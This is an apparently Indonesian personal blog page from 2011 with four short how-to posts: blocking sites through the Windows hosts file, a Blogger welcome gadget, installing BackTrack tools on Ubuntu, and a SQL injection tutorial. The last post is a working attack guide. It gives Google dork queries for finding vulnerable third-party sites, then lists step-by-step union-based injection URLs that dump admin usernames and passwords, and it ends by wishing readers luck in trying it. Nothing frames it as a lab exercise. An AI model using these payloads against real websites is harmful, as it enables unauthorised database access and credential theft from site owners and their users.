Senin, 18 Juli 2011

Blokir Website Secara Manual(windows)



duh bete nieh...!!
enakan ngapain y..?
ehhhmmm....
mndingan nulis d blog jah deh...
disini w mau nulis tentag blokir website dengan manual tanpa menggunakan software,
ehmm, langsing jah y..!!

1. ketik windows + r (klik start -> run), nanti akan muncul sebuah jendela run, abis itu tulis ini dah notepad C:/Windows/System32/drivers/etc/hosts


2. jika sudah klik OK

3. nanti akan muncul notepad seperti pada gambar di bawah ini,


4. kemudian kamu bisa tulis 127.0.0.1 (nama website yang ingin di blokir)
example : 127.0.0.1 www.facebook.com
127.0.0.1 facebook.com

jika sudah di save deh, (ctrl + s / klik file -> save)

5. selamat mencoba.... :D
di Tidak ada komentar:
Label:

Rabu, 06 Juli 2011

Tampilan GUI welcome di Blogger anda



sehubung saya gy g ad kerjaan, y dah deh mencoba untuk iseng bikin tulisan..
hehehe..

untuk membuat pesan welcome dalam bentuk GUI di blogger, yang anda dapat lakukan adalah :
=> masuk ke dashboard
=> kemudian masuk rancangan
=> jika sudah masuk ke rancangan, kemudian anda tambahkan gadget, dimana saja..
=> kemudian pilih yang html/javascript
=> lalu terserah anda tulis pada judulnya, kemudian dalam konten'a anda dapet copy source code'a disini


=> jika sudah simpan
=> kemudian tinggal lihat hasilnya deh....

SELAMAT MENCOBA..!!! :D
di Tidak ada komentar:
Label:

Aplikasi Backtrack di Ubuntu




System Operasi Backtrack merupakan sistem operasi open source, yang dimana sistem operasi ini bagus dalam bidang pentester / security.

maka dari itu, bagi teman-teman yang ingin mencoba aplikasi backtrack , tapi g punya sistem operasi backtrack, hanya punya ubuntu, tidak usah cemas, karena ubuntu juga bisa di gunakan aplikasi-aplikasi backtrack...

akan saya jelaskan cara agar aplikasi backtrack bisa digunakan di ubuntu..
=> Edit file sources.list
sudo gedit /etc/apt/sources.list

=> Tambahkan repository backtrack
deb http://archive.offensive-security.com pwnsauce main microverse macroverse restricted universe multiverse

=> Lalu Add Key melalui terminal
sudo wget -q http://archive.offensive-security.com/backtrack.gpg -O- | sudo apt-key add -

=> Perbarui daftar paket:
sudo apt-get update

=> Install aplikasi backtrack
sudo apt-get install nama-aplikasi-backtrack

SELAMAT MENCOBA

hasil'a seperti ini = (tampilan sypnatic package manager)


di Tidak ada komentar:
Label:

Minggu, 03 Juli 2011

SQL injection



sql injection adalah serangan yang memanfaatkan kelalaian dari website, dan juga sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client, dan juga sql injection merupakan teknik mengeksploitasi qwb aplikasi yang didalamnya menggunakan database untuk penyimpanan data

langsung jah y, cara-cara SQL injection:
=> cari target web yang ingin di sql injection dengan cara serching di google dengan menggunakan kata kunci, contohnya sebagai berikut

>>inurl:trainers.php?id=
>>inurl:buy.php?category=
>>inurl:article.php?ID=
>>inurl:play_old.php?id=
>>inurl:declaration_more.php?decl_id=

=> nah, jika sudah memilih web yang ingn di sql injection, untuk mengecek apakah web tersebut bisa di sql injection yaitu dengan cara menambahkan di urlnya yang terakhir dengan simbol petik satu('), jika terjadi error sql, maka web tersebut bisa di sql injection.
example:(http://testsql.com/news.php?id=321')

=> langkah selanjutnya, adalah hapus tanda petik yang tadi, kemudian di tambahkan kata order by 1--, ini berfungsi untuk mencari kesalahan pada web tersebut, intinya kita mencari error pada web tersebut, jika sudah menemukan error maka yang diambil nilai sebelum error.
example:
(http://testsql.com/news.php?id=321 order by 1-- no error )
(http://testsql.com/news.php?id=321 order by 2-- no error )
(http://testsql.com/news.php?id=321 order by 3-- no error )
(http://testsql.com/news.php?id=321 order by 4-- no error )
(http://testsql.com/news.php?id=321 order by 5-- no error )
(http://testsql.com/news.php?id=321 order by 6-- no error )
(http://testsql.com/news.php?id=321 order by 7-- error )
nah berati yang diambil yang ini http://testsql.com/news.php?id=321 order by 6--

=> kemudian anda ganti order by nya dengan union all select, kemudian angka 6 nya di jabarkan satu per satu seperti 1,2,3,4,5,6 dan di depan angka sesudah = anda tambahkan -, jadi contohnya seperi ini.
(http://testsql.com/news.php?id=-321 union all select 1,2,3,4,5,6--)

=> nanti akan muncul angka-angka, anda ambil salah satu jah, tapi menurut saya ambil angka yang paling atas, kemudian pada url'a, pada angka yang tertera anda ganti dengan @@version, ini berfungsi untuk menampilkan versi mysql, kita disini akan menjeaskan sql injection dengan menggunakan mysql versi 5, misalkan ada angka 3, nah angka 3 nya anda ganti dengan @@version.
example :(http://testsql.com/news.php?id=-321 union all select 1,2,@@version,4,5,6--)

=> kemudian nanti ankan muncul angka, angka tersebut merupakan keterangan versi mysql yang digunakan web tersebut, jika keluarnya 5.0.1 maka kita bisa mengsql injection web tersebut.., langsung jah, yang @@version anda ganti dengan group_concat(table_name) lalu pada akhir url sebelum -- anda tambahkan dengan from information_schema.tables where table_schema=databses().
example:(http://testsql.com/news.php?id=-321 union all select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema=database()--)

=> kemudian akan muncul beberapa tulisan, kita cari yang berhubungan dengan admin / user, karena kita disini mencari table user / admin, jika sudah nemu kata admin / user, langkah selanjutnya kata admin / user anda convert menjadi hex, bisa menggunkan web disini http://www.string-functions.com/string-hex.aspx (hasil dari convert hex user = 75736572), jika sudah, langkah selanjutnya adalah mengganti kata databse() dengan hasil conver hex yang tadi dan ditambahkan dengan 0x(misalkan kita ambil kata user), kemudian ganti kata table yang ada di dalam kurung menjadi column dan kata tables diganti dengan columns, lalu kata table_schema, kata schemanya itu di ganti dengan kata name.
example: (http://testsql.com/news.php?id=-321 union all select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name=0x75736572--)

=> nanti akan muncul hasil dari table yang dicari, biasanya yang keluar adalah user dan password, maka kata user dan password anda copy, lalu kata column_name yang ada di dalam kurung anda ganti dengan user dan password, dimana ditengah-tengah user dan password ditambahkan kata 0x3a, lalu yang hasil hex nya diganti dengan kata sebelum di convert ke hex(misalkan awalanya tadi ambil kata user, nah kita ganti dengan kata user) kata information'a anda hapus sampai sama dengan (=).
example:(http://testsql.com/news.php?id=-321 union all select 1,2,group_concat(user,0x3a,password),4,5,6 from user--)

=> nanti akan muncul user dan password(biasanya password tidak dalam bentuk string).

SELAMAT MENCOBA
di Tidak ada komentar:
Label:
Langganan: Postingan (Atom)